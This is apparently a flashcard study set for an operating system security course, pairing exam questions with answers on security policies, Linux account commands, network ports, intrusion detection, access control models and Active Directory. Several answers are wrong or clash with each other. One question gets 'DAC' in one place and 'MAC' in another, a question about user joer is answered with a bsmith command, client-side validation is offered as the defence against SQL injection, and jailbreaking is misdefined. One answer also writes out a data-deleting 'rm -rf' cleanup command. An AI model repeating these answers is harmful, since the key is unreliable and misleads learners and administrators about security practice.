CIS1358 Operating System Security

User management policy

A policy that identifies actions to follow when employee status changes to ensure the security of the system, including hiring new employees, promoting and transferring employees, and terminating employees.

Privacy policy

A policy that outlines how the organization will secure private information for its employees, clients, and customers.

Change Management and Configuration Policy

A policy that regulates changes to policies, practices, and equipment that could impact the security of your IT structure.

Authorized Access Policy (AAP)

A policy that specifies access controls that are employed on a network

Human Resources (HR) Policy

A policy used by HR that defines hiring and termination processes, job rotation requirements, and personal time off procedures.

What is mutual authentication?

A process by which each party in an online communication verifies the identity of the other party

Guideline

A recommendation that is used when a specific standard or procedure doesn't exist.

Regulation

A requirement published by a government or other licensing body that must be followed

Which actions can a typical passive intrusion detection system (IDS) take when it detects an attack? (Select two.)

An alert is generated and delivered via email, the console, or an SNMP trap. The IDS logs all pertinent data about the intrusion.

Which command should you use to display both listening and non-listening sockets on your Linux system? (Tip: Enter the commands as if at the command prompt.)

netstat -a

You need to increase the security of your Linux system by finding and closing open ports. Which of the following commands should you use to locate open ports?

nmap

Which command should you use to scan for open TCP ports on your Linux system? (Tip: Enter the command as if at the command prompt.)

nmap -sT

Which form of access control enforces security based on user identities and allows individual users to define access controls over owned resources?

DAC

You have a system that allows the owner of a file to identify users and their permissions to the file. Which type of access control model is implemented?

DAC

What is the purpose of audit trails?

Detect security-violating events.

Audit trails produced by auditing activities are which type of security control?

Detective

Which of the following are advantages of virtualization? (Select two.)

Easy migration of systems to different hardware. Centralized administration.

You are concerned about attacks directed against the firewall on your network. You would like to examine the content of individual frames sent to the firewall.

Packet sniffer

You want to know which protocols are being used on your network. You'd like to monitor network traffic and sort traffic by protocol. Which tool should you use?

Packet sniffer

The auditing feature of an operating system serves as what form of control when users are informed that their actions are being monitored?

Preventative

You suspect that the gshant user account is locked. Enter the command you use at the command prompt to show the status of the user account.

passwd -S gshant

A user with the account name larry has just been terminated from the company. There is good reason to believe that the user will attempt to access and damage files in the system in the very near future. Which of the following commands will disable or remove the user account from the system and remove his home directory?

userdel -r larry

You have performed an audit and have found an active account for an employee with the username joer. This user no longer works for the company. Which command can you use to disable this account?

userdel bsmith; rm -rf /home/bsmith (or) userdel -r bsmith

Which of the following utilities could you use to lock a user account? (Select two. Each answer represents an independent solution.)

usermod passwd

One of your users, Karen Scott, has recently married and is now Karen Jones. She has requested that her username be changed from kscott to kjones, but no other values change. Which of the following commands will accomplish this?

usermod -l kjones kscott

You have performed an audit and found an active account for an employee with the username joer. This user no longer works for the company. Which command can you use to disable the account?

usermod -L joer

You want to make sure no unneeded software packages are running on your Linux server. Select the command from the drop-down list that you can use to see all installed RPM packages.

yum list installed

Password policy

A policy that details the password requirements used in an organization.

In the /etc/shadow file, which character in the password field indicates that a standard user account is locked?

!

You want to close all ports associated with NetBIOS on your network firewalls to prevent attacks directed against NetBIOS. Which ports should you close?

135, 137-139

To transfer files to your company's internal network from home, you use FTP. The administrator has recently implemented a firewall at the network perimeter and disabled as many ports as possible. Now you can no longer make an FTP connection. You suspect the firewall is causing the issue. Which ports need to remain open so you can still transfer the files? (Select two.)

20 21

What actions can a typical passive intrusion detection system take when it detects an attack? (Select two.)

1. An alert is generated and delivered via e-mail, the console, or SNMP trap. 2. The IDS logs all pertinent data about the intrusion.

Which of the following activities are considered passive with regard to the functioning of an intrusion detection system? (Choose two.)

1. Monitoring the audit trails on a server 2. Listening to network traffic

An active IDS system often performs which of the following actions? (Select two.)

1. Perform reverse lookups to identify an intruder. 2. Update filters to block suspect traffic.

Which of the following ports does FTP use to establish sessions and manage traffic?

20, 21

Which ports does LDAP use by default? (Select two.)

389 636

To increase security on your company's internal network, the administrator has disabled as many ports as possible. Now, however, though you can browse the internet, you are unable to perform secure credit card transactions. Which port needs to be enabled to allow secure transactions?

443

You want to deploy SSL to protect authentication traffic with your LDAP-based directory service. What port would this use?

636

You want to increase the security of your network by allowing only authenticated users to be able to access network devices through a switch. Which of the following should you implement?

802.1x

Gramm-Leach-Bliley Act of 1999

A US federal law designed to protect private information held at financial institutions.

Sarbanes-Oxley Act of 2002

A US federal law that requires publicly traded companies to adhere to very stringent reporting requirements and implement strong controls on electronic financial reporting systems.

HIPAA of 1996

A US federal law that specifies that all organizations must protect the health information that they maintain.

Which of the following best describes Active Directory?

A centralized database that contains user account and security information

Which of the following are disadvantages to server virtualization?

A compromised host system might affect multiple servers.

Code Escrow Agreement

A document that specifies the storage and conditions of a release of a source code.

Which of the following are disadvantages of server virtualization?

A failure in one hardware component could affect multiple servers.

What is a cookie?

A file saved on your hard drive that tracks Web site preferences and use.

Users in the sales department perform many of their daily tasks, such as emailing and creating sales presentations, on personal tablets. The chief information officer worries that one of these users might also use their tablet to steal sensitive information on the organization's network. Your job is to implement a solution that can prevent insiders from accessing sensitive information on personal devices. Which of the following should you implement?

A guest wireless network that is isolated from your organization's production network.

Organizational Security Policy

A high-level overview of the corporate security program.

Smart devices are attractive targets for cyber criminals because they typically have minimal security and are not protected with anti-malware software. This makes it easier to exploit these types of devices and perpetrate attacks. Many smart devices can be utilized to conduct a single coordinated attack. What is this type of attack usually called?

A highly distributed attack

Which of the following describes a configuration baseline?

A list of common security settings that a group or all devices share.

Users in the sales department perform many of their daily tasks, such as emailing and creating sales presentations, on company-owned tablets. These tablets contain sensitive information. If one of these tablets is lost or stolen, this information could end up in the wrong hands. The chief information officer wants you to implement a solution that can be used to keep sensitive information from getting into the wrong hands if a device is lost or stolen. Which of the following should you implement?

A mobile device management infrastructure.

Service Level Agreement (SLA)

A negotiated agreement between the customer and the provider that guarantees the quality of a network service provider's care to a subscriber. The SLA may specify the levels of availability, serviceability, performance, operation, or other commitment requirements.

Which of the following is the strongest form of multi-factor authentication?

A password, a biometric scan, and a token device

Acceptable use policy (AUP)

A policy that defines how users should use the information and network resources in an organization.

Code of Ethics

A set of rules or standards that help individuals to act ethically in various situations.

Baseline

A standard that dictates the settings and security mechanisms that must be imposed on a system in order to comply with required security standards.

Procedure

A step-by-step process that outlines how to implement a specific action

In a variation of the brute force attack, an attacker may use a predefined list (dictionary) of common user names and passwords to gain access to existing user accounts. Which countermeasure best addresses this issue?

A strong password policy

Which of the following statements about virtual networks is true? (Select two.)

A virtual network is dependent on the configuration and physical hardware of the host operating system. Multiple virtual networks can be associated with a single physical network adapter.

Which of the following switch attacks associates the attacker's MAC address with the IP address of the victim's device?

ARP spoofing/poisoning

Which of the following terms describes the component that is generated following authentication and is used to gain access to resources following login?

Access token

Tom Plask's user account has been locked because he entered too many incorrect passwords. You need to unlock the account. Click the tab in the properties of the Tom Plask user object you would use to unlock his account.

Account

What is the most important aspect of a biometric device?

Accuracy

A security administrator is conducting a penetration test on a network. She connects a notebook system running Linux to the wireless network and then uses NMAP to probe various network hosts to see which operating system they are running. Which process did the administrator use in the penetration test in this scenario?

Active fingerprinting

You have a shared folder named Reports. Members of the Managers group have been given write access to the shared folder. Mark Mangum is a member of the Managers group. He needs access to the files in the Reports folder, but should not have any access to the Confidential.xls file. What should you do?

Add Mark Mangum to the ACL for the Confidential.xls file with Deny permissions.

You have been receiving a lot of phishing emails sent from the domain kenyan.msn.pl. Links within these emails open new browser windows at youneedit.com.pl. You want to make sure that these emails never reach your inbox, but you want to make sure that emails from other senders are not affected. What should you do?

Add kenyan.msn.pl to the email blacklist.

Which of the following strategies can protect against a rainbow table password attack?

Add random bits to the password before hashing takes place.

You manage several Windows systems. Desktop users access an in-house application that is hosted on your intranet web server. When a user clicks a specific option in the application, they receive an error message that the pop-up was blocked. You need to configure the security settings so that users can see the pop-up without compromising overall security. What should you do?

Add the URL of the website to the Local intranet zone.

You manage several Windows systems. All computers are members of a domain. You use an internal website that uses Integrated Windows Authentication. You attempt to connect to the website and are prompted for authentication. You verify that your user account has permission to access the website. You need to ensure that you are automatically authenticated when you connect to the website. What should you do?

Add the internal website to the Local intranet zone.

Your organization provides its sales force with Windows 8.1 tablets to use while visiting customer sites. You manage these devices by enrolling them in a cloud-based Windows Intune account. One of your sales representatives left his notebook at a customer's site. The device contains sensitive information, and you want to change the password to prevent the data from being compromised. Which Intune portal should you use to remotely change the password?

Admin portal

Your organization provides its sales force with Windows RT 8.1 tablets to use while visiting customer sites. You manage these devices by enrolling them in your cloud-based Windows Intune account. One of your sales representatives left her tablet at an airport. The device contains sensitive information, and you need to remove it in case the device is compromised. Which Intune portal should you use to perform a remote wipe?

Admin portal

What does the netstat -a command show?

All listening and non-listening sockets

You want to allow e-commerce websites that you visit to keep track of your browsing history for shopping carts and other information, but want to prevent that information from being tracked by sites linked to the sites you explicitly visit. How should you configure the browser settings?

Allow first party cookies, but block third-party cookies.

Many popular operating systems allow quick and easy file and printer sharing with other network members. Which of the following is not a means by which file and printer sharing is hardened?

Allowing NetBIOS traffic outside of your secured network.

Match each mobile device application control term on the right with the appropriate description on the left. Each description may be used once, more than once, or not at all. Jailbreaking, Sideloading, Sandboxing, Assigned Access

Jailbreaking: Allows apps to be installed from sources other than the App Store. Sideloading: Allows apps to be installed from sources other than the Windows Store. Sandboxing: Prevents a running app from accessing data stored by other running apps. Assigned Access: Defines a whitelist of Windows Store applications.

Match the exploit on the right with the appropriate description on the left. Watering hole attack, Arbitrary code execution exploit, LSO exploit, Zero-day attack

Watering hole attack: An attacker compromises a Web site, hoping that a target individual will access the site and be exposed to the exploit. Arbitrary code execution exploit: A vulnerability in a running process allows an attacker to inject malicious instructions and run them. LSO exploit: A flash cookie is used to collect information about the user's browsing habits without their permission. Zero-day attack: An attacker exploits computer application vulnerabilities before they are known and patched by the application's developer.

You are concerned about protecting your network from network-based attacks from the Internet. Specifically, you are concerned about attacks that have not yet been identified or that do not have prescribed protections. Which type of device should you use?

Anomaly based IDS

What is the most common form of host based IDS that employs signature or pattern matching detection methods?

Anti-virus software

Which of the following statements about the use of anti-virus software is correct?

Anti-virus software should be configured to download updated virus definitions files as soon as they become available.

You have just purchased a new network device and are getting ready to connect it to your network. Which of the following actions should you take to increase its security? (Select two.)

Apply all patches and updates. Change default account passwords.

Which of the following is the best recommendation for applying hotfixes to our servers?

Apply only the hotfixes that affect software running on your systems.

What is another name for a logic bomb?

Asynchronous attack.

Which access control model is based on assigning attributes to objects and using Boolean logic to grant access based on the attributes of the subject?

Attribute-based Access Control (ABAC)

Which of the following is a collection of recorded data that may include details about logons, object access, and other activities deemed important by your security policy that is often used to detect unwanted and unauthorized user activity?

Audit trail

A recreation of historical events is made possible through?

Audit trails

Which of the following terms identifies the process of reviewing log files for suspicious activity and threshold compliance?

Auditing

A remote access user needs to gain access to resources on the server. Which of the following processes are performed by the remote access server to control access to resources?

Authentication and authorization

While developing a network application, a programmer adds functionality that allows her to access the running program without authentication so she can capture debugging data. The programmer forgets to remove this functionality prior to finalizing the code and shipping the application. What type of security weakness does this represent?

Backdoor

Network-based intrusion detection is most suited to detect and prevent which types of attacks?

Bandwidth-based denial of service

KWalletManager is a Linux-based credential management system that stores encrypted account credentials for network resources. Which encryption methods can KWalletManager use to secure account credentials? (Select two.)

Blowfish GPG

A programmer that fails to check the length of input before processing leaves his code vulnerable to what form of common attack?

Buffer overflow

Having poor software development practices and failing to program input validation checks during development of custom software can result in a system vulnerable to which type of attack?

Buffer overflow

Which type of attack is the act of exploiting a software program's free acceptance of input in order to execute arbitrary code on a target?

Buffer overflow

What is a typical goal of MAC spoofing?

Bypassing 802.1x port-based security

Click on the object in the TESTOUTDEMO.com Active Directory domain that is used to manage individual desktop workstation access.

CORPWS7

You've just deployed a new Cisco router that connects several network segments in your organization. The router is physically located in a server room that requires an ID for access. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration interface from your notebook computer using a Telnet client with a user name of admin and a password of admin. You have used the MD5 hashing algorithm to protect the password. What should you do to increase the security of this device? (Select two.)

Change the default administrative user name and password. Use an SSH client to access the router configuration.

You've just deployed a new Cisco router so you can connect a new segment to your organization's network. The router is physically located in a server room that can only be accessed with an ID card. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration from your notebook computer by connecting it to the console port on the router. The web-based management interface uses the default user name of cusadmin and a password of highspeed. What should you do to increase the security of this device?

Change the user name and create a more complex password.

Which of the following are performed by the Microsoft Baseline Security Analyzer (MBSA) tool? (Select three.)

Check for missing patches Check for open ports Check user accounts for weak passwords

To help prevent browser attacks, users of public computers should do which of the following?

Clear the browser cache

You want to prevent your browser from running JavaScript commands that are potentially harmful. Which of the following would you restrict to accomplish this?

Client side scripts

You decide to use syslog to send log entries from multiple servers to a central logging server. Which of the following are the most important considerations for your implementation? (Select two.)

Clock synchronization between all devices Disk space on the syslog server

During the application development cycle, a developer asks several of his peers to assess the portion of the application he was assigned to write for security vulnerabilities. Which assessment technique was used in this scenario?

Code review

Which of the following is a password that relates to things that people know, such as a mother's maiden name or the name of a pet?

Cognitive

Which of the following applications typically use 802.1x authentication? (Select two)

Controlling access through a wireless access point Controlling access through a switch

Match the Group Policy type on the left with the function that it can perform on the right. (Each item can be used more than once.)

Software that should be installed on a specific computer: Computer Configuration. Scripts that should run at startup or shutdown: Computer Configuration. Network communication security settings: Computer Configuration. Software that should be installed for a specific user: User Configuration. Scripts that should run at logon or logoff: User Configuration.

During the application development cycle, an application tester creates multiple virtual machines on a hypervisor, each with a different version and edition of Windows installed. She then installs the latest build of the application being developed on each virtual machine and evaluates each installation for security vulnerabilities. Which assessment technique was used in this scenario?

Configuration testing

Which of the following is a text file provided by a website to a client that is stored on a user's hard drive in order to track and record information about the user?

Cookie

Use of which of the following is a possible violation of privacy?

Cookies

You have a small network of devices connected using a switch. You want to capture the traffic that is sent from Host A to Host B. On Host C, you install a packet sniffer that captures network traffic. After running the packet sniffer, you cannot find any captured packets between Host A and Host B. What should you do?

Configure port mirroring

You are the network administrator for a city library. Throughout the library are several groups of computers that provide public access to the Internet. Supervision of these computers has been difficult. You've had problems with patrons bringing personal laptops into the library and disconnecting the network cables from the library computers to connect their laptops to the Internet. The library computers are in groups of four. Each group of four computers is connected to a hub that is connected to the library network through an access point on a switch. You want to restrict access to the network so only the library computers are permitted connectivity to the internet. What can you do?

Configure port security on the switch

To tightly control the anti-malware settings on your computer, you elect to update the signature file manually. Even though you vigilantly update the signature file, the machine becomes infected with a new type of malware. Which of the following actions would best prevent this scenario from occurring again?

Configure the software to automatically download the definition file updates as soon as they become available.

Drag the software-defined networking (SDN) layer on the left to the appropriate function on the right. (Each SDN layer may be used once, more than once, or not at all.)

This layer receives its requests from the application layer: Control layer. This layer is also known as the infrastructure layer: Physical layer. This layer communicates with the control layer through what's called the northbound interface: Application layer. This layer provides the physical layer with configuration and instructions: Control layer. On this layer, individual networking devices use southbound APIs to communicate with the control plane: Physical layer.

You want to store your computer-generated audit logs in case they are needed in the future for examination or to be used as evidence in the event of a security incident. Which method can you use to ensure that the logs you put in storage have not been altered when you go to use them in the future?

Create a hash of each log.

You notice that over the last few months more and more static systems, such as the office environment control system, the security system, and lighting controls, are connecting to your network. You know that these devices can be a security threat. Which of the following measures can you take to minimize the damage these devices can cause if they are compromised?

Create a VLAN to use as a low-trust network zone for these static systems to connect to.

You are responsible for maintaining Windows workstation operating systems in your organization. Recently, an update from Microsoft was automatically installed on your workstations that caused an in-house application to stop working. To keep this from happening again, you decide to test all updates on a virtual machine before allowing them to be installed on production workstations. Currently, none of your testing virtual machines have a network connection. However, they need to be able to connect to the update servers at Microsoft to download and install updates.

Create a new virtual switch configured for bridged (external) networking. Connect the virtual network interfaces in the virtual machine to the virtual switch.

You are an application developer. You use a hypervisor with multiple virtual machines installed to test your applications on various operating system versions and editions. Currently, all of your testing virtual machines are connected to the production network through the hypervisor's network interface. However, you are concerned that the latest application you are working on could adversely impact other network hosts if errors exist in the code. To prevent this, you decide to isolate the virtual machines from the production network. However, they still need to be able to communicate directly with each other. What should you do?

Create a new virtual switch configured for host-only (internal) networking. Connect the virtual network interfaces in the virtual machines to the virtual switch.

You have multiple users who are computer administrators. You want each administrator to be able to shut down the system and install drivers. What should you do? (Select two.)

Create a security group for the administrators and add all user accounts to the group. Grant the group the necessary user rights.

You want to give all managers the ability to view and edit a certain file. To do so, you need to edit the discretionary access control list (DACL) associated with the file. You want to be able to easily add and remove managers as their job positions change. What is the best way to accomplish this?

Create a security group for the managers. Add all users as members of the group. Add the group to the file's DACL.

A manager has told you she is concerned about her employees writing their passwords for websites, network files, and database resources on sticky notes. Your office runs exclusively in a Windows environment. Which tool could you use to prevent this behavior?

Credential Manager

A security administrator logs on to a Windows server on her organization's network. She then runs a vulnerability scan on that server. What type of scan was conducted in this scenario?

Credentialed scan

Which protocol should you disable on the user access ports of a switch?

DTP

When you dispose of a computer or sell used hardware, it is crucial that none of the data on the hard disks can be recovered. Which of the following actions can you take to ensure that no data is recoverable?

Damage the hard disks so badly that all the data remanence is gone.

You've been assigned to evaluate NoSQL databases as a part of a big data analysis initiative in your organization. You've downloaded an open source NoSQL database from the internet and installed it on a test system in an isolated lab environment. Which of the following are likely to be true about this test system? (Select two.)

Data is stored in the database in an unencrypted format. The database admin user has no password assigned.

Which of the following defines an object as an entity in the context of access control?

Data, applications, systems, networks and physical space

Which of the following are subject to SQL injection attacks?

Database servers

Active Directory is a hierarchical database. Hierarchical directory databases have several advantages over flat file database structures. Which of the following is not an advantage of Active Directory's hierarchical database structure?

Decentralization

You are using a vulnerability scanner that conforms to the OVAL specifications. Which of the following items contains a specific vulnerability or security issue that could be present on a system?

Definition

When securing a newly deployed server, which of the following rules of thumb should be followed?

Determine unneeded services and their dependencies before altering the system.

Which of the following best describes the concept of virtual LAN?

Devices on the same network logically grouped as if they were on separate networks

Why do attackers prefer to conduct distributed network attacks in static environments? (Select two.)

Devices tend to employ much weaker security than traditional network devices. Devices are, typically, more difficult to monitor than traditional network devices.

You've been given an assignment to evaluate NoSQL databases as a part of a big data analysis initiative in your organization. You've downloaded an open source NoSQL database from the internet and installed it on a test system in an isolated lab environment. What should you do to harden this database before implementing it in a production environment? (Select two.)

Disable anonymous access. Implement an application-layer protocol to encrypt data prior to saving it in the database.

What should you do to a user account if the user goes on an extended vacation?

Disable the account

Which of the following actions should you take to reduce the attack surface of a server?

Disable unused services

IF maintaining confidentiality is of the utmost importance to your organization, what is the best response when an intruder is detected on your network?

Disconnect the intruder

Drag the Active Directory component on the left to the appropriate description on the right.
• A server that holds a copy of the Active Directory database that can be written to.
• A folder that subdivides and organizes network resources within a domain.
• An administratively defined collection of network resources that share a common directory database and security policies.
• A computing element that identifies resources in the Active Directory database.

• Domain Controller: a server that holds a writable copy of the Active Directory database.
• Organizational Unit: a folder that subdivides and organizes network resources within a domain.
• Domain: an administratively defined collection of network resources that share a common directory database and security policies.
• Object: a computing element that identifies resources in the Active Directory database.

When you browse to a website, a pop-up window tells you that your computer has been infected with a virus. You click on the window to see what the problem is. Later, you find out that the window has installed spyware on your system. What type of attack has occurred?

Drive-by download

What is the most common means of virus distribution?

Email

Your organization recently purchased 18 iPad tablets for use by the organization's management team. These devices have iOS pre-installed on them. To increase the security of these devices, you want to apply a default set of security-related configuration settings. What is the best approach to take to accomplish this? (Select two. Each option is a part of a complete solution.)

Enroll the devices in a mobile device management system. Configure and apply security policy settings in a mobile device management system.

Your organization recently purchased 30 tablet devices for your traveling sales force. These devices have Windows RT preinstalled on them. To increase the security of these devices, you want to apply a default set of security-related configuration settings. What is the best approach to take to accomplish this? (Select two. Each option is part of a complete solution.)

Enroll the devices in a mobile device management system. Configure and apply security policy settings in a mobile device management system.

You have configured a NIDS to monitor network traffic. Which of the following describes an attack that is NOT detected by the NIDS device?

False Negative

You have configured an NIDS to monitor network traffic. Which of the following describes harmless traffic that has been identified as a potential attack by the NIDS device?

False positive

Which of the following is not an advantage when using an internal auditor to examine security systems and relevant documentation?

Findings in the audit and subsequent summations are viewed objectively

Which of the following identifies an operating system or network service based upon its response to ICMP messages?

Fingerprinting

You have heard about a Trojan horse program where the compromised system sends personal information to a remote attacker on a specific TCP port. You want to be able to easily tell whether any of your systems are sending data to the attacker. Which log would you monitor?

Firewall

You suspect that some of your computers have been hijacked and are being used to perform denial of service attacks directed against other computers on the Internet. Which log would you check to see if this is happening?

Firewall

You are implementing a new application control solution. Prior to enforcing your application whitelist, you want to monitor user traffic for a period of time to discover user behaviors and log violations for later review. How should you configure the application control software to handle applications not contained in the whitelist?

Flag

Which of the following enters random data to the inputs of an application?

Fuzzing

As a security precaution, you have implemented IPsec between any two devices on your network. IPsec provides encryption for traffic between devices. You would like to implement a solution that can scan the contents of the encrypted traffic to prevent any malicious attacks. Which solution should you implement?

Host-based IDS

Which of the following terms describes a Windows operating system patch that corrects a specific problem and is released on a short-term, periodic basis (typically monthly)?

Hotfix

Recently, a serious security breach occurred in your organization. An attacker was able to log in to the internal network and steal data through a VPN connection using the credentials assigned to a vice president in your organization. For security reasons, all individuals in upper management in your organization have unlisted home phone numbers and addresses. However, security camera footage from the vice president's home recorded someone rummaging through her garbage cans prior to the attack. The vice president admitted to writing her VPN login credentials on a sticky note that she subsequently threw away in her household trash. You suspect the attacker found the sticky note in the trash and used the credentials to log in to the network. You've reviewed the vice president's social media pages. You found pictures of her home posted, but you didn't notice anything in the photos that would give away her home address. She assured you that her smart phone was never misplaced prior to the attack. Which security weakness is the most likely cause of the security breach?

Geo-tagging was enabled on her smart phone.

Patriot Act of 2001

Gives law enforcement the ability to request information from organizations to detect and suppress terrorism.

For users who are members of the sales team, you want to force computers to use a specific desktop background and remove access to administrative tools from the Start menu. Which solution should you use?

Group Policy

Which of the following solutions would you use to control the actions that users can perform on a computer, such as shutting down the system, logging on through the network, or loading and unloading device drivers?

Group Policy

You have contracted with a vendor to supply a custom application that runs on Windows workstations. As new application versions and patches are released, you want to be able to automatically apply them to multiple computers. Which tool is your best choice for accomplishing this task?

Group Policy

Which of the following government acts protects medical records and personal health information?

HIPAA

By definition, what is the process of reducing security exposure and tightening security controls?

Hardening

Marcus White has just been promoted to a manager. To give him access to the files that he needs, you make his user account a member of the Managers group, which has access to a special shared folder. Later that afternoon, Marcus tells you that he is still unable to access the files reserved for the Managers group. What should you do?

Have Marcus log off and log back in

Which of the following are characteristics of a rootkit? (Select two.)

Hides itself from detection. Requires administrator-level privileges for installation.

You want to create a collection of computers on your network that appear to have valuable data, but are really computers configured with fake data that could entice a potential intruder. Once the intruder connects, you want to be able to observe and gather information about the methods of attack that are being deployed. What should you implement?

Honeynet

What do host-based intrusion detection systems often rely upon to perform their detection activities?

Host system auditing capabilities

What does a host-based intrusion detection system often rely upon to perform detection activities?

Host system auditing capabilities

You have installed anti-malware software that checks for viruses in email attachments. You configure the software to quarantine any files with problems. You receive an email with an important attachment, but the attachment is not there. Instead, you see a message that the file has been quarantined by the anti-malware software. What has happened to the file?

It has been moved to a secure folder on your computer.

What security mechanism can be used to detect attacks originating on the internet or from within an internal trusted subnet?

IDS

Which of the following devices can monitor a network and detect potential security attacks?

IDS

Which of the following devices is capable of detecting and responding to security threats?

IPS

You are concerned about attacks directed at your network firewall. You want to be able to identify and be notified of any attacks. In addition, you want the system to take immediate action to stop or prevent the attack, if possible. Which tool should you use?

IPS

Which of the following are security devices that perform stateful inspection of packet data and look for patterns that indicate malicious code? (Select two.)

IPS. IDS.

Match each bring your own device (BYOD) security issue on the right with a possible remedy on the left. Each remedy may be used once, more than once, or not at all.
• Preventing malware infections
• Supporting mobile device users
• Preventing loss of control of sensitive data
• Preventing malicious insider attacks
• Applying the latest anti-malware definitions

• Preventing malware infections: Implement a network access control (NAC) solution.
• Supporting mobile device users: Specify who users can call for help with mobile device apps in your acceptable use policy.
• Preventing loss of control of sensitive data: Enroll devices in a mobile device management system.
• Preventing malicious insider attacks: Specify where and when mobile devices can be possessed in your acceptable use policy.
• Applying the latest anti-malware definitions: Implement a network access control (NAC) solution.

Your organization's security policy specifies that peer-to-peer file sharing is not allowed. Recently, you received an anonymous tip that an employee has been using a BitTorrent client to download copyrighted media while at work. You research BitTorrent and find that it uses TCP ports 6881—6889 by default. When you check your perimeter firewall configuration, only ports 80 and 443 are open. When you check your firewall logs, you find that no network traffic using ports 6881—6889 has been blocked. What should you do?

Implement an application control solution

Your organization uses a web server to host an e-commerce site. Because this web server handles financial transactions, you are concerned that it could become a prime target for exploits. You want to implement a network security control that will analyze the contents of each packet going to or from the web server. The security control must be able to identify malicious payloads and block them. What should you do?

Implement an application-aware IPS in front of the web server

An attacker inserts SQL database commands into a data input field of an order form used by a Web-based application. When submitted, these commands are executed on the remote database server, causing customer contact information from the database to be sent to the malicious user's Web browser. Which practice would have prevented this exploit?

Implementing client-side validation

While using a Web-based order form, an attacker enters an unusually large value in the Quantity field. The value she entered is so large that it exceeds the maximum value supported by the variable type used to store the quantity in the Web application. This causes the value of the quantity variable to wrap around to the minimum possible value, which is a negative number. As a result, the Web application processes the order as a return instead of a purchase, and the attacker's account is credited with a large sum of money. Which practices would have prevented this exploit? (Select two.)

Implementing client-side validation. Implementing server-side validation.

You have decided to perform a double blind penetration test. Which of the following actions would you perform first?

Inform senior management

Which of the following is specifically meant to ensure that a program operates on clean, correct, and useful data?

Input validation

You manage information systems for a large co-location data center. Networked environmental controls are used to manage the temperature within the data center. These controls use embedded smart technology that allows them to be managed over an internet connection using a mobile device app. You are concerned about the security of these devices. What can you do to increase their security posture? (Select two.)

Install the latest firmware updates from the device manufacturer. Verify that your network's existing security infrastructure is working properly.

You manage the information systems for a large manufacturing firm. Supervisory control and data acquisition (SCADA) devices are used on the manufacturing floor to manage your organization's automated factory equipment. The SCADA devices use embedded smart technology, allowing them to be managed using a mobile device app over an internet connection. You are concerned about the security of these devices. What can you do to increase their security posture? (Select two.)

Install the latest firmware updates from the device manufacturer. Verify that your network's existing security infrastructure is working properly.

While using a Web-based order form, an attacker enters an unusually large value in the Quantity field. The value she entered is so large that it exceeds the maximum value supported by the variable type used to store the quantity in the Web application. This causes the value of the quantity variable to wrap around to the minimum possible value, which is a negative number. As a result, the Web application processes the order as a return instead of a purchase, and the attacker's account is refunded a large sum of money. What type of attack has occurred in the scenario?

Integer overflow

You notice a growing number of devices, such as environmental control systems and wearable devices, are connecting to your network. These devices, known as smart devices, are sending and receiving data via wireless network connections. Which of the following labels applies to this growing ecosystem of smart devices?

Internet of things

Which of the following best describes spyware?

It monitors the actions you take on your machine and sends the info back to its originating source.

You want to check a server for user accounts that have weak passwords. Which tool should you use?

John the Ripper

Which of the following is an example of a single sign-on authentication solution?

Kerberos

Which of the following protocols uses port 88?

Kerberos

Which of the following are examples of single sign-on authentication solutions? (Select two.)

Kerberos. SESAME.

Which of the following authentication mechanisms is designed to protect a nine-character password from attacks by hashing the first seven characters into a single hash and then hashing the remaining two characters into another separate hash?

LANMAN

While using a Web-based game created using Adobe Flash, a Flash cookie is set on a user's computer. The game saves legitimate data in the Flash cookie, such as statistics and user preferences. However, the game creator also programmed the game to track the Web sites that the user visits while the game is running and save them in the Flash cookie. This data is transferred to a server over an Internet connection without the user's permission. What type of exploit has occurred in this scenario?

Locally shared object (LSO) exploit

Which of the following are included in an operations penetration test? (Select two.)

Looking through discarded paper or media for sensitive information. Eavesdropping or obtaining sensitive information from items that are not properly stored.

Which of the following attacks, if successful, causes a switch to function like a hub?

MAC flooding

You have two folders that contain documents used by various departments:
• The Development group has been given the Write permission to the Design folder.
• The Sales group has been given the Write permission to the Products folder.
No other permissions have been given to either group. User Mark Tillman needs to have the Read permission to the Design folder and the Write permission to the Products folder. You want to use groups as much as possible. What should you do?

Make Mark a member of the Sales group; add Mark's user account directly to the ACL for the Design folder.

Which access control model is based on multilevel security where objects are assigned a security classification and subjects are granted a security clearance which allows them to access objects at or below that security classification?

Mandatory Access Control (MAC)

Which form of access control enforces security based on user identities and allows individual users to define access controls over owned resources?

Mandatory access control (MAC)

Tom Plask was recently transferred to the Technical Support department. He now needs access to the network resources used by Support employees. To grant him access, you need to add Tom Plask's user account to the Support group in the Active Directory domain. Click the tab in the properties of the Tom Plask user object you would use to accomplish this.

Member of

You have placed an FTP server in your DMZ behind your firewall. The FTP server will be used to distribute software updates and demonstration versions of your products. Users report that they are unable to access the FTP server. What should you do to enable access?

Open ports 20 and 21 for inbound and outbound connections.

You decide to use a packet sniffer to identify the type of traffic sent to a router. You run the packet sniffing software on a device that is connected to a hub with three other computers. The hub is connected to the same switch that is connected to the router. When you run the software, you see frames addressed to the four workstations, but not to the router. Which feature should you configure?

Mirroring

Which of the following activities are considered passive with regard to the function of an intrusion detection system?

Monitoring the audit trails on a server. Listening to network traffic.

You've just deployed a new Cisco router that connects several network segments in your organization. The router is physically located in a cubicle near your office. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration interface from your notebook computer using an SSH client with the user name admin01 and the password P@ssW0rd. You have used the MD5 hashing algorithm to protect the password. What should you do to increase the security of this device?

Move the router to a secure server room.

Match the virtualization feature on the right with the appropriate description on the left.
• Flexibility
• Testing
• Server consolidation
• Sandboxing

• Flexibility: Moving virtual machines between hypervisor hosts.
• Testing: Verifying that security controls are working as designed.
• Server consolidation: Performing a physical-to-virtual migration (P2V).
• Sandboxing: Isolating a virtual machine from the physical network.

Which of the following best describes one-factor authentication?

Multiple authentication credentials may be required, but they are all of the same type

You have a file server named Srv3 that holds files used by the Development department. You want to allow users to access the files over the network and control access to files accessed through the network or a local logon. Which solution should you implement?

NTFS and share permissions

Which of the following is not included in a system level audit event? (Select two.)

Names of accessed files. Any actions performed by the user.

Your network devices are categorized into the following zone types:
• No-trust zone
• Low-trust zone
• Medium-trust zone
• High-trust zone
Your network architecture employs multiple VLANs for each of these network zones. Each zone is separated by a firewall that ensures only specific traffic is allowed. Which of the following is the secure architecture concept that is being used on this network?

Network Segmentation

You want to identify all devices on a network along with a list of open ports on those devices. You want the results displayed in a graphical diagram. Which tool should you use?

Network mapper

